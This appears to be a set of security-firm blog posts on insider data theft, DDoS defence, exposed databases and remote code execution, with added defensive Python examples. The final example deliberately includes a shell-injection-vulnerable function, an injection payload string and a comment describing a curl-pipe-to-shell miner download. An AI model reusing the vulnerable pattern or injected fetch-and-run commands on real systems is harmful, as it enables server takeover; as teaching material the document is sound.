How to Prevent Departing Employees from Departing with Your Organization’s Data
The risk of departing employees leaving with their employer's data has been highlighted again by a recent case involving one of the biggest tech companies, Apple.
A special agent of the Federal Bureau of Investigation (FBI) recently filed a criminal complaint in the US District Court for the Northern District of California against a former Apple employee, alleging that the former employee, a hardware engineer on the company's autonomous vehicle development team, stole trade secrets from the company.
According to the FBI special agent, because of the former employee's role on Apple’s autonomous vehicle development project, he was granted broad access to secure and confidential internal databases containing trade secrets and intellectual property for the project.
After returning from paternity leave, the employee, according to the FBI special agent, resigned, saying that he planned to move back to his home country and to work for another company active in autonomous vehicle technology.
The employee turned over all Apple-owned devices, and Apple security disabled his remote network access, badge privileges and other employee access.
The criminal complaint revealed that data from Apple's security team showed that, in the days prior to his resignation, the former employee's network activity increased exponentially compared to the prior two years of his employment. On the evening two days before his resignation, CCTV footage showed the employee entering the autonomous vehicle software and hardware labs and leaving the building less than an hour later carrying a large box.
The criminal complaint also disclosed that, in an interview with an Apple security attorney and an Apple employee relations representative, the accused admitted downloading data to a non-Apple device owned by his wife because he had an "interest in platforms and wanted to study the data on his own." He also admitted to FBI agents that he had taken files from Apple's autonomous vehicle development project and transferred them to that non-Apple device.
Files recovered from the non-Apple device included a 25-page document containing schematics for one of the circuit boards that form Apple's proprietary infrastructure technology for its autonomous vehicle development project.
FBI agents arrested the former Apple employee at San Jose International Airport as he was about to leave the country.
Prevalence of Departing Employees Stealing or Leaking Corporate Data
The case against the former Apple employee is only one of many in which departing employees have left with their employer's data.
In 2014, the Federal Court of Australia found sufficient evidence that a former employee of Leica Geosystems Pty Ltd had copied 190,000 files from the company's computers the day before he resigned. The copied files included source code representing the core of the company's intellectual property. The court ordered the former employee to pay AUD$50,000 to his former employer for the misconduct.
In 2015, an employee of BlueScope, after learning she was to be terminated, downloaded 40 gigabytes of company documents. The company filed legal actions in the Federal Court of Australia and in Singapore to stop the information from reaching its competitors. BlueScope and the former employee reached a confidential settlement, and the Federal Court of Australia permanently restrained the former employee from using the data in her possession.
A survey conducted by Biscom showed the prevalence of departing employees departing with their employers’ data. The Biscom survey showed the following alarming findings:
Data Leak Prevention
1. Limit Employee Access to Data
Give employees access only to the data they need to do their jobs. For instance, engineers don't need access to CRM systems, and sales staff don't need access to source code or hardware schematics.
2. Encrypt Critical Corporate Data
Ensure that critical corporate data is encrypted in transit, at rest and, where the technology allows, in use. Encryption means that leaked data remains useless to anyone without the keys. Note that it does not stop an insider who is authorized to decrypt the data as part of their job, as in the Apple case: encryption protects against loss of the storage, not against misuse of legitimate access.
3. Establish Regular IT Audits
While automated, preventive controls are the best defense, no technology is perfect. Regular IT audits performed by an independent third party help to detect outliers, data leaks and internal fraud early. Such audits generally include
4. Require Appropriate Authentication for Critical Content
Access to critical content must require multi-factor authentication, not just a username and password. It also helps to require prior approval for access to the most sensitive content, or at least to alert a compliance officer when it is accessed.
5. Regularly Monitor Network Activities
Examples of activity that should be monitored are unusual volumes of downloaded data, access outside office hours and copies to unmanaged devices. Such activity is a red flag for unauthorized use and should be investigated. In the Apple case, the evidence that later supported the complaint was exactly this kind of telemetry: a spike in network activity compared with the employee's own history, plus badge and CCTV records of an after-hours visit to the labs.
6. Keep Critical Data Offline
Don't store information vital to your organization, especially trade secrets, on any device that connects to the internet unless there is no practical alternative. Where such data must be online, keep it in tightly restricted systems rather than on general-purpose file shares.
7. In-Person Data Security and Privacy Training
One means, though not a cure-all, of preventing departing employees from stealing corporate data is in-person data security training from the moment an employee is hired.
One training session isn't enough. Remind employees regularly about safeguarding the company's data through a formal, recurring cybersecurity awareness program. In addition to the training, employment contracts must include a confidentiality or non-disclosure provision, and the departure process should remind the employee of those obligations.
8. Don’t Give Employees Administrator Privileges
Don't give employees administrator rights on company-supplied computers or devices. Administrator privileges let a user install unapproved software, disable endpoint protection and data loss prevention agents, and mount unmanaged storage, any of which can lead to unauthorized access to, or removal of, information vital to your organization.
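The monitoring described in item 5 (unusual download volumes and access outside office hours) can be reduced to a small script. The following is an added example, not code from the original article or from any of the companies named in it: it compares each user's daily transfer volume with that user's own history and flags after-hours access. The log format (timestamp, user, bytes transferred, source host), the baseline window, the thresholds and the user names are assumptions, and the log lines are constructed.

```python
"""Flag employees whose data-access volume or timing departs from their own
baseline. Added example, not from the original article; the log format
(timestamp user bytes source_host), the baseline window and the thresholds
are assumptions, and the log lines are constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: four ordinary days for two users, then one user
# pulls ~100x the usual volume, at night, partly to an unmanaged device.
SAMPLE_LOG = """\
2018-06-18T10:12:03 jdoe 120000000 eng-ws-17
2018-06-19T11:40:51 jdoe 95000000 eng-ws-17
2018-06-20T09:05:11 jdoe 130000000 eng-ws-17
2018-06-21T14:22:40 jdoe 110000000 eng-ws-17
2018-06-22T02:17:09 jdoe 4800000000 eng-ws-17
2018-06-22T23:49:30 jdoe 6100000000 personal-laptop
2018-06-18T10:30:00 asmith 50000000 eng-ws-22
2018-06-19T10:31:00 asmith 48000000 eng-ws-22
2018-06-20T10:32:00 asmith 52000000 eng-ws-22
2018-06-21T10:33:00 asmith 51000000 eng-ws-22
"""

def parse_log(text):
    """Return (timestamp, user, bytes, host) tuples, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, nbytes, host = line.split()
        events.append((datetime.fromisoformat(ts), user, int(nbytes), host))
    return events

def daily_totals(events):
    """user -> {date: bytes transferred that day}"""
    totals = defaultdict(lambda: defaultdict(int))
    for ts, user, nbytes, _ in events:
        totals[user][ts.date()] += nbytes
    return totals

def find_anomalies(events, baseline_days=4, sigma=3.0, office_hours=(8, 19)):
    """Return {user: [(date, reason), ...]}.

    Volume rule: a day is flagged when it exceeds the user's own baseline mean
    by more than `sigma` standard deviations; the baseline is that user's
    first `baseline_days` days, and the deviation gets a floor of 5% of the
    mean so a perfectly flat baseline still leaves some slack.
    Timing rule: any access outside `office_hours` (24h clock) is flagged.
    """
    findings = defaultdict(list)
    for user, per_day in daily_totals(events).items():
        days = sorted(per_day)
        baseline = [per_day[d] for d in days[:baseline_days]]
        mu, sd = mean(baseline), pstdev(baseline)
        for d in days[baseline_days:]:
            if per_day[d] > mu + sigma * max(sd, 0.05 * mu):
                findings[user].append((d, f"volume {per_day[d] / mu:.0f}x own baseline"))
    start, end = office_hours
    for ts, user, _, host in events:
        if not start <= ts.hour < end:
            findings[user].append((ts.date(), f"after-hours access from {host} at {ts:%H:%M}"))
    return dict(findings)

if __name__ == "__main__":
    for user, items in find_anomalies(parse_log(SAMPLE_LOG)).items():
        for day, reason in items:
            print(f"{day} {user}: {reason}")
```

The comparison is against the user's own history rather than a global threshold, because a hardware engineer and a sales representative have very different normal volumes; a user with fewer observed days than the baseline window is never volume-flagged, which is the script's blind spot for brand-new accounts.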
When you need help with either establishing regular IT Audits or performing data leakage assessments, help is a phone call away. Contact us today and protect your business.
DDoS Attacks: Protecting Your Business from Critical Disruption
In late February 2018, developer platform GitHub was struck by the most powerful DDoS (distributed denial-of-service) attack recorded at the time.
How big? 1.35 terabits of traffic was hitting GitHub each second.
Still, GitHub was not without its defenses.
Within 10 minutes of the attack starting, GitHub's DDoS mitigation provider stepped in to combat it. GitHub's traffic was rerouted through the provider's scrubbing centres, which dropped the malicious packets and passed the legitimate traffic on.
Such decisive action paid off. The attack ended eight minutes after the service took over, and GitHub was able to get back on track after just five minutes of downtime.
If GitHub had been without such a fast, effective response, the outcome of the attack might have been much worse.
A DDoS attack is an attempt to disrupt the normal operation of a server, service or network by bombarding it with more traffic than it can handle.
The traffic comes from many compromised computer systems at once, which overwhelms the target and crowds out genuine users.
GitHub had been targeted before, with an attack lasting for six days in 2015.
A company or organization's website can be severely affected by a DDoS attack, potentially costing it a lot of money in lost business. In fact, the average cost of a DDoS attack to businesses rose to more than $2.5 million in 2017.
Research highlights just how common DDoS disruptions are. A staggering 849 of 1,010 enterprises questioned had been hit by a DDoS attack, and the disruption was estimated to cost target businesses as much as $100,000 per hour.
These figures make for disturbing reading, especially for smaller companies on a much tighter budget than their larger competitors. Still, even for global corporations, the risk of a DDoS attack can be incredibly troubling: after all, they may have more to lose.
Effective cybersecurity and preparation have never been more vital, and budget has to be set aside for reinforcing your business against potential threats.
Still, this is easier said than done: cybercrime and security can be daunting. To help you understand how best to defend yourself against DDoS attacks, we have explored some of the most effective options below:
Get to know the symptoms
Recognizing the signs of an incoming DDoS attack can make a significant difference to how you handle it.
There is usually no real warning of a DDoS attack. While some attackers issue threats or ransom demands beforehand, there will generally be nothing other than the assault itself.
As you might not browse your own website much day to day, it may not be until customers begin complaining about its performance that the warning bells start to sound. External monitoring of response times and error rates from outside your own network removes that dependence on customer complaints.
However, certain other clues will tip you off:
The earlier you’re able to spot the warning signs, the sooner you can start to act.
Have a plan
Every business should have a plan in place for a potential DDoS attack. Once you confirm that your system has been targeted, you can jump to your plan and follow it. Being prepared helps to reduce the likelihood of panic or making mistakes that exacerbate the disruption.
Make sure all key players from each department are alerted to the situation and understand how best to handle it at their end. If everyone can work together and focus on damage limitation, you’re more likely to come out of the DDoS attack with minimal impact.
Companies that have no preparations for dealing with such a situation could waste valuable time trying to make sense of it.
Know how to prioritize
Your system will have only limited capacity during a DDoS attack. Focus on keeping the highest-value services and applications running to preserve as much normal function as possible.
Again, this comes down to planning. You should have an immediate idea which areas can be let go and which must be the priority.
Pay attention to your network security
Conducting security audits on your network on a regular basis is an effective way to keep your system protected.
Take a close look at the strength of passwords (particularly for the most exposed systems), review which employees have access to key data, and run comprehensive checks on software. Do you have the most up-to-date versions? Have any known security risks come to light with an application you're using?
A network security audit may not be enough in itself to defend your business against a DDoS attack, but it can play a large part in the process. Incorporate this into ongoing workplace routines: make sure it becomes a habit and is never overlooked.
Letting your system go without the proper audits and preparations can leave it vulnerable to attack. Being complacent and assuming your business will escape the attention of cybercriminals is never a smart move.
Turn to the professionals
Your system security is paramount to keeping your business up and running. Not only does your entire flow of service depend on effective protection, so too does your customers’ experience.
Lengthy downtime can leave buyers with little choice but to start looking elsewhere if you cannot meet their needs. On top of this, they may wonder how safe their personal and financial data are within your company.
Hiring a professional cybersecurity firm to defend your system against DDoS attacks can help to take the strain. You will be free to focus on other areas of running your business while the experts handle the heavy lifting.
Are you concerned about your company's vulnerability to DDoS attacks? What steps have you taken to safeguard your system? Share your thoughts and ideas below and contact us today to protect your organization.
How to Prevent Accidental Database Leaks
Florida-based marketing and data aggregation firm Exactis is the latest organization to have accidentally exposed a critical database online.
Security researcher Vinny Troia disclosed to Wired that, early this month, Exactis exposed nearly 340 million records, about 230 million of them on U.S. consumers and 110 million on business contacts.
"It seems like this is a database with pretty much every US citizen in it," Troia told Wired. "I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”
The close to 2 terabytes of data exposed by Exactis didn’t contain credit card information or Social Security numbers. It, however, revealed highly personal information, including phone numbers, home addresses, email addresses, religion, age, gender of the person's children, and interests like plus-size apparel and scuba diving.
Wired confirmed the authenticity of the exposed data, noting that in some cases the information was inaccurate or outdated.
Prior to his disclosure to Wired, Troia said, he contacted both Exactis and the FBI about his discovery. Exactis has since protected the data so that it is no longer publicly accessible.
The number of records unintentionally exposed by Exactis exceeds the roughly 148 million consumers affected by the 2017 Equifax breach. The difference is that, in the case of Exactis, the people concerned are not even aware that they are in the company's database.
Past Incidents of Accidental Database Leaks
While the Exactis exposure may have been the largest accidental database leak to date, reports of accidental database leaks have come up again and again in the past few years.
Another security researcher, Chris Vickery, has discovered a number of accidental database leaks. In December 2015, Vickery discovered that the database housing 3.3 million Hello Kitty accounts was exposed as a result of a misconfigured MongoDB installation (MongoDB is a free, open-source, cross-platform document-oriented database).
In April 2016, Vickery discovered that the voter registration details of 93.4 million Mexican citizens were exposed via a publicly accessible database hosted on an Amazon cloud server.
In January 2017, Vickery also discovered that an Ontario-based plastic surgery clinic had leaked thousands of customers' medical records online through an unprotected rsync service (rsync synchronizes files between two computers or servers; an rsync daemon left reachable from the internet without authentication lets anyone pull the files it serves).
In October 2017, RedLock researchers reported that attackers had infiltrated the Kubernetes console (Kubernetes is the open-source platform, originally designed by Google, that automates deploying, scaling and operating application containers) of Aviva, a British multinational insurance company, after the company left it reachable without a password. One of Aviva's Kubernetes pods contained credentials to the company's Amazon Web Services (AWS) account. According to RedLock, this let the attackers use Aviva's cloud compute resources for cryptocurrency mining, specifically mining Bitcoin.
In February 2018, RedLock researchers reported that attackers had similarly infiltrated the Kubernetes console of Tesla after the company failed to secure it with a password. One of Tesla's Kubernetes pods contained credentials to Tesla's AWS account. RedLock said this enabled the attackers to use Tesla's cloud compute resources to mine the cryptocurrency Monero quietly in the background.
Accidental Leaks Discovery
According to Troia, he discovered the exposed Exactis database simply by using Shodan, a search engine for internet-connected devices used by researchers and security professionals. Troia said he used Shodan to search for all Elasticsearch databases visible on publicly accessible servers with American IP addresses.
This search returned about 7,000 results, the Exactis database being one of them, unprotected by any firewall. Elasticsearch is a document-oriented search engine whose HTTP API is meant to be queried over the network; when an instance is bound to a public address with no authentication in front of it, anyone who can reach the port can read and dump its contents.
For his part, Vickery told ZDNet that he finds accidental database leaks via Shodan as well. There is, however, nothing stopping malicious hackers from using tools like Shodan to discover the same exposures. The challenge for ethical hackers like Troia and Vickery is to discover accidental database leaks and report them to the organizations concerned before malicious hackers find them.
"I’m not the first person to think of scraping ElasticSearch servers," Troia said in the case of Exactis’ accidental data leak. "I’d be surprised if someone else didn't already have this."
Data Leak Prevention
Here are some of the security best practices in preventing accidental database leaks:
1. Monitor Firewall Traffic
A firewall is your first line of defense in preventing accidental database leaks.
A firewall, which can be a hardware, software or both, monitors incoming and outgoing network traffic. It decides based on a defined set of security rules whether to allow or block specific traffic. For instance, a firewall can be configured to block data from certain locations or applications while allowing relevant data in.
RedLock reported that, while a firewall is one of the industry's best practices, "85% of resources were found to have no firewall restrictions on any outbound traffic".
While a firewall is a good first line of defense, it is not a cure-all for accidental database leaks: a database deliberately bound to a public address and allowed through the firewall is still exposed.
2. Monitor Configurations
Proper configuration is critical in preventing accidental database leaks. Configuration means the settings that control how a service behaves: which network interface a database binds to, whether authentication is required, whether a management console such as the Kubernetes dashboard is reachable without a password. A simple check of that last setting could have prevented the Tesla breach.
3. Monitor Suspicious User Behavior
As the examples above show, accidental database leaks are not uncommon in public cloud environments. Your organization needs to detect them as soon as possible, before the bad guys do.
Monitoring has to go beyond geolocation and time-based anomalies to cover event-based anomalies as well, such as an unusual volume of traffic or an unusual volume of downloaded data.
When your team needs help, our team of experts is a phone call away. Contact us today and stay safe!
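Item 2's configuration check, as an added example that is not part of the original article or of any vendor's tooling: a small audit of elasticsearch.yml and mongod.conf fragments for the two settings that turn a database into a public leak, the bind address and whether authentication is on. The config fragments are constructed, the exposed shape sits beside the corrected one, and the defaults assumed for keys that are absent (Elasticsearch binding to loopback with security off, MongoDB binding to loopback with authorization disabled) are stated in the code as assumptions; the reader handles only the flat and nested key: value subset of YAML these files use, not IPv6 literals or lists.

```python
"""Audit of database configuration fragments for public exposure.
Added example, not from the original article. The config texts are
constructed; defaults assumed for missing keys are stated in the code."""

LOOPBACK = {"127.0.0.1", "::1", "localhost", "_local_"}

def parse_simple_yaml(text):
    """Minimal reader for the flat ('network.host: x') and nested
    ('net:' / '  bindIp: x') key: value subset of YAML that elasticsearch.yml
    and mongod.conf use. Returns dotted key -> string value.
    Assumption: no lists, quoting, anchors or IPv6 literals in the input."""
    result, stack = {}, []          # stack holds (indent, key) of open sections
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()   # drop comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while stack and stack[-1][0] >= indent:
            stack.pop()                         # close sections we have left
        path = [k for _, k in stack] + [key.strip()]
        if value.strip():
            result[".".join(path)] = value.strip()
        else:
            stack.append((indent, key.strip()))
    return result

def is_exposed(bind_value):
    """True if any listed bind address is not a loopback address."""
    return any(addr.strip() not in LOOPBACK for addr in bind_value.split(","))

def audit(config_text, kind):
    """Return a list of findings for one config file; empty means clean."""
    cfg = parse_simple_yaml(config_text)
    if kind == "elasticsearch":
        # Assumed defaults (6.x, basic licence): loopback bind, security off.
        bind = cfg.get("network.host", "_local_")
        auth_on = cfg.get("xpack.security.enabled", "false").lower() == "true"
    elif kind == "mongodb":
        # Assumed defaults (3.6+): loopback bind, authorization disabled.
        bind = cfg.get("net.bindIp", "127.0.0.1")
        auth_on = cfg.get("security.authorization", "disabled").lower() == "enabled"
    else:
        raise ValueError(f"unknown service kind: {kind}")
    findings = []
    exposed = is_exposed(bind)
    if exposed:
        findings.append(f"{kind}: listens on non-loopback address {bind}")
    if not auth_on:
        findings.append(f"{kind}: authentication is not enabled")
    if exposed and not auth_on:
        findings.append(f"{kind}: CRITICAL unauthenticated database reachable over the network")
    return findings

# Constructed fragments: the exposed shape beside the corrected one.
ES_WEAK = """\
cluster.name: prod-search
network.host: 0.0.0.0          # reachable on every interface
http.port: 9200
"""
ES_FIXED = """\
cluster.name: prod-search
network.host: 127.0.0.1
http.port: 9200
xpack.security.enabled: true
"""
MONGO_WEAK = """\
net:
  port: 27017
  bindIp: 0.0.0.0
security:
  authorization: disabled
"""
MONGO_FIXED = """\
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.0.5   # loopback plus one private address
security:
  authorization: enabled
"""

if __name__ == "__main__":
    for name, text, kind in [("ES_WEAK", ES_WEAK, "elasticsearch"),
                             ("ES_FIXED", ES_FIXED, "elasticsearch"),
                             ("MONGO_WEAK", MONGO_WEAK, "mongodb"),
                             ("MONGO_FIXED", MONGO_FIXED, "mongodb")]:
        print(name, audit(text, kind) or ["clean"])
```

The distinction between the two findings matters in practice: a database on a private address with authentication on is a warning (it still relies on the network boundary), whereas a public bind with no authentication is the Exactis and Hello Kitty shape and needs fixing before anything else.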
DDoS Attacks: Dangers and Ways to Protect your Network
DDoS (Distributed Denial of Service) attacks continue to make headlines. In the past week, one such attack caused severe traffic issues during a key political debate in Mexico, affecting a website opposing presidential candidate Andres Manuel Lopez Obrador.
Elections are set to take place on 1 July, and the target domain has been openly critical of his policies. During the attack, 185,000 visits took place in just 15 minutes; the majority originated in China and Russia.
This was a blatant attempt to crash the site, and the culprits have yet to be identified. Attribution is difficult because the traffic originates from compromised systems whose owners have no idea they are taking part.
This isn’t the first time DDoS attacks have disrupted political websites, and countries are taking action to defend themselves. The US Election Assistance Commission has dedicated over $380m in funding for cybersecurity.
DDoS attacks defined
DDoS attacks flood the target website with traffic from numerous origin points, possibly numbering in the thousands. As a result, stopping a DDoS attack in its tracks is very hard: there is no single IP address causing the issue, and blocking all traffic would also shut out legitimate visitors.
They differ from DoS attacks, which come from a single computer and IP address flooding a vulnerable system.
There are a few common types of DDoS attack. Traffic-based attacks, such as SYN floods, exhaust the connection-tracking capacity of servers, firewalls and load balancers with half-open connections.
Bandwidth attacks are another danger: they saturate the target's network links with overwhelming volumes of 'junk' data, which can cause a total denial of service.
Application-layer DDoS attacks use seemingly legitimate requests to exhaust the application's own resources, such as database queries or search operations, until the system can no longer function as it should.
When a website is unable to provide its customers or members with the services they expect, it can damage their reputation and disrupt their revenue. There’s a risk to security too, with consumers left wondering how safe their personal data may be.
This is a major concern for today’s more tech-savvy users, who are much more aware of the dangers lax security measures and cyber-attacks pose.
Taking action against DDoS attacks
How can you protect your network against DDoS attacks and ensure your business or organization is prepared to handle one if the worst happens?
Minimize the potential
Minimizing the surface area exposed to attack is key, as it reduces the options available to would-be DDoS attackers.
To do this, consider placing resources behind load balancers or a content delivery network (CDN), which absorbs and spreads the traffic to your public-facing content. You can also restrict which traffic can reach vital parts of your system, such as your database servers, so that they are never directly reachable from the internet.
Create a plan of action
You need a plan for every major cybersecurity risk threatening your business and customers. With a DDoS plan, the key aspect is determining how you will keep delivering services if an attack manages to disrupt your system.
You should make sure everyone within your company is made aware of what a DDoS attack is, how it may manifest, and how their work would be affected.
The aim is to make sure your company as a whole would essentially be able to roll with the proverbial punches, to minimize the disruption and get back on track as soon as possible.
Get to know the signs
It's best to learn the warning signs of an impending DDoS attack. While high-volume attacks are common and can be damaging, low-volume ones may be launched as a test of your network's capabilities. These probes let attackers identify potential holes in your defenses before the real attack.
Pay attention to your average traffic patterns. This may help you spot significant changes in geographic sources and volumes, enabling you to take preventative action before the attack is fully underway.
Capture the packet
When you start to notice a DDoS attack is in effect, you should try to spot the key characteristics in order to take action against it. DDoS attacks typically rely on forceful traffic volumes your system simply can’t handle, and while it may be impossible to sort the ‘good’ traffic from the ‘bad’, you can identify telltale similarities between sources.
Run a fast packet capture of the attack, and you should be able to find similarities fairly easily, as the majority of traffic hitting your website will be part of the attack. Giveaway details might show up in the user agent or URI, and once you find a pattern you can block it via a router ACL or firewall rule.
Routers and firewalls can drop specific IP addresses and filter unnecessary protocols, but they are not a complete defense against high-volume attacks: a volumetric attack that saturates your upstream link has done its damage before your firewall ever sees the packets. Firewalls in particular should not be relied on to keep your entire network safe.
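The triage described above (find the pattern shared by the attack traffic, then turn it into a block list) as an added example, not code from the original article: it runs over a web server access log in combined format rather than a raw packet capture, because for an application-layer flood the user agent and URI are already in the log. The log lines are constructed (40 attacking hosts in the 203.0.113.0/24 documentation range sharing one user agent and one URI, plus a handful of ordinary visitors), and the thresholds and function names are assumptions.

```python
"""Triage of a web access log during a suspected application-layer DDoS.
Added example, not from the original article. The log lines are
constructed; the format is the Apache/nginx combined log format."""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

ATTACK_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
LEGIT_UAS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/67.0.3396.87",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0",
]

def _build_sample_log():
    """Constructed sample: 40 attacking hosts hammering one URI with one
    identical user agent (5 requests each), plus 10 ordinary requests."""
    lines = []
    for i in range(1, 41):
        for k in range(5):
            lines.append(
                f'203.0.113.{i} - - [28/Jun/2018:14:00:{(i + k) % 60:02d} +0000] '
                f'"GET /search?q=x HTTP/1.1" 200 512 "-" "{ATTACK_UA}"'
            )
    for k in range(10):
        lines.append(
            f'198.51.100.{k % 3 + 5} - - [28/Jun/2018:14:00:{k:02d} +0000] '
            f'"GET /page{k}.html HTTP/1.1" 200 4096 "-" "{LEGIT_UAS[k % 3]}"'
        )
    return "\n".join(lines)

SAMPLE_ACCESS_LOG = _build_sample_log()

def parse(text):
    """Parse combined-format lines; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records

def triage(text, share_threshold=0.6, min_hits=3):
    """Find the dominant user agent and URI. If one user agent accounts for
    at least `share_threshold` of all requests, treat it as the attack
    signature and list the sources that sent `min_hits` or more requests
    with it (the candidates for a router ACL or firewall block)."""
    records = parse(text)
    if not records:
        return {"total": 0, "signature_ua": None, "signature_share": 0.0,
                "top_uri": None, "top_uri_share": 0.0, "block": []}
    total = len(records)
    top_ua, top_ua_n = Counter(r["ua"] for r in records).most_common(1)[0]
    top_uri, top_uri_n = Counter(r["uri"] for r in records).most_common(1)[0]
    share = top_ua_n / total
    block = []
    if share >= share_threshold:
        per_ip = Counter(r["ip"] for r in records if r["ua"] == top_ua)
        block = sorted(ip for ip, n in per_ip.items() if n >= min_hits)
    return {"total": total, "signature_ua": top_ua, "signature_share": share,
            "top_uri": top_uri, "top_uri_share": top_uri_n / total, "block": block}

def iptables_rules(ips):
    """Render the block list as iptables drop rules; a router ACL would be
    generated from the same list."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in ips]

if __name__ == "__main__":
    result = triage(SAMPLE_ACCESS_LOG)
    print(f"{result['total']} requests, {result['signature_share']:.0%} from "
          f"{result['signature_ua']!r}, top URI {result['top_uri']}")
    print("\n".join(iptables_rules(result["block"])))
```

The user-agent share is the trigger rather than the IP count because a distributed flood spreads thin across many addresses; requiring a minimum number of hits per source before blocking keeps a single legitimate visitor who happens to use the same browser string off the list, which is also why the block list must be reviewed and expired rather than left in place indefinitely.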
Again, having a plan in place and being prepared to shift gears is critical to minimize the disruption as much as possible.
DDoS attacks are, sadly, not going to go away any time soon. Your business or organization has to take steps necessary to stay as protected as possible and put a contingency plan in place to stop your infrastructure collapsing if an attack takes place.
Working with cybersecurity specialists and running a vulnerability assessment of your network can help you prepare. Want to know more about the options available to you?
Give our expert team a call!
What is Remote Code Execution Attack & How to Prevent this Type of Cyberattack
Microsoft recently rolled out its latest security update, fixing 50 security vulnerabilities. Of the 50 vulnerabilities fixed in the June 12 security update, 14 allow remote code execution.
What is Remote Code Execution?
Remote code execution (RCE) refers to the ability of an attacker to run code of their choosing on a computer owned by someone else, over a network, without authorization and regardless of where the computer is physically located.
RCE allows an attacker to take over a computer or server by running arbitrary malicious software (malware). "RCE (remote code execution) vulnerabilities are one of the most dangerous of its kind as attackers may execute malicious code in the vulnerable server," Imperva said.
Remote Code Execution Example #1: Microsoft Excel Remote Code Execution Vulnerability
One example of a remote code execution vulnerability is CVE-2018-8248, one of the vulnerabilities fixed by Microsoft in its June 12 security update. CVE-2018-8248, also known as the "Microsoft Excel Remote Code Execution Vulnerability", allows an attacker to run code of their choosing on the vulnerable computer.
An attacker exploiting CVE-2018-8248 runs with the privileges of the user who opened the file. If that user is logged on with administrative rights, the attacker could take full control of the computer: view, change or delete data, install programs, or create new accounts with full user rights. Working day to day as a standard user limits the damage such a vulnerability can do.
According to Microsoft, the vulnerability could be exploited through a malicious email carrying a specially crafted Excel file as an attachment. Another delivery method is a web-based attack, in which the attacker hosts a website, or compromises one that accepts user-provided content, containing a specially crafted file designed to exploit the vulnerability.
In both scenarios, malicious email and web-based attack, the attacker has to convince the user to open the attachment or follow a link to the specially crafted file; the vulnerability cannot be triggered without that user action. To date, there is no report of CVE-2018-8248 being exploited in the wild.
Remote Code Execution Example #2: Microsoft Windows SMB Vulnerability
On May 12, 2017, hundreds of thousands of computers worldwide were infected by WannaCry, ransomware that encrypts computer files, locks users out and demands a ransom payment to decrypt them.
WannaCry spreads by exploiting a remote code execution vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol, which is used for sharing access to files, printers and other resources on a network: an attacker who can send specially crafted messages to a vulnerable SMBv1 server can run code on it.
Unlike remote code execution attacks that rely on malicious emails and web pages as delivery methods, WannaCry scanned the internet and local networks for machines exposing SMB (TCP port 445) and used "EternalBlue", one of the alleged U.S. National Security Agency (NSA) tools, to exploit the SMB vulnerability. Once EternalBlue succeeded, it installed DoublePulsar (another alleged NSA tool), a kernel-level backdoor, which was then used to load the WannaCry payload onto the machine.
EternalBlue and DoublePulsar are two of the tools allegedly used by the NSA that were leaked in April 2017 by a group calling itself the Shadow Brokers. According to Microsoft, the vulnerabilities exposed by the Shadow Brokers had been fixed by the security update the company released in March 2017 (MS17-010), a month before the Shadow Brokers publicly released the tools.
Researchers at Rendition reported that in late April and the first few days of May 2017, weeks after Microsoft issued the security update fixing the vulnerabilities exposed by the Shadow Brokers, more than 148,000 computers were compromised by EternalBlue and DoublePulsar.
WannaCry infected hundreds of thousands of computers because of its worm-like, self-propagating capability: every infected machine scanned for other vulnerable machines on its local network and on random internet addresses and infected them in turn, so one unpatched host inside a network was enough to compromise every other unpatched host reachable from it.
Remote Code Execution Attacks and Cryptocurrency Mining
At the height of the cryptocurrency boom in December 2017, Imperva reported that cryptocurrency mining drove almost 90% of all remote code execution attacks.
Imperva said 88% of all remote code execution attacks in December 2017 sent a request to an external source to try to download cryptocurrency mining malware.
“These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server,” Imperva said. “The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denies service to the application’s users.”
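The web-application remote code execution that Imperva describes is very often a bug of this shape: user input spliced into a command line or interpreter. The following is an added example, not code from the article or from Imperva, showing a vulnerable lookup function beside a hardened one. `echo` stands in for the network tool (nslookup, ping) such code usually wraps, so that the example runs offline; the hostname rule and the function names are assumptions.

```python
"""Command injection: the web-application RCE shape Imperva describes.
Added example, not from the article. `echo` stands in for a network tool
such as nslookup so the example runs offline; names are assumptions."""
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens, joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def lookup_vulnerable(host):
    """Vulnerable: user input is concatenated into a shell command line, so
    shell metacharacters (; | && $( )) in `host` run as the server's user.
    Substitute 'curl http://.../miner | sh' for 'echo INJECTED' and this is
    the crypto-mining infection described above."""
    result = subprocess.run(
        f"echo resolving {host}", shell=True, capture_output=True, text=True
    )
    return result.stdout

def lookup_hardened(host):
    """Hardened: allow-list the input, then pass it as a single argv element
    with no shell at all, so even a bypass of the validator could not turn
    the value into a second command."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected host: {host!r}")
    result = subprocess.run(
        ["echo", "resolving", host], capture_output=True, text=True
    )
    return result.stdout

if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print("vulnerable:", repr(lookup_vulnerable(payload)))
    try:
        lookup_hardened(payload)
    except ValueError as err:
        print("hardened:", err)
```

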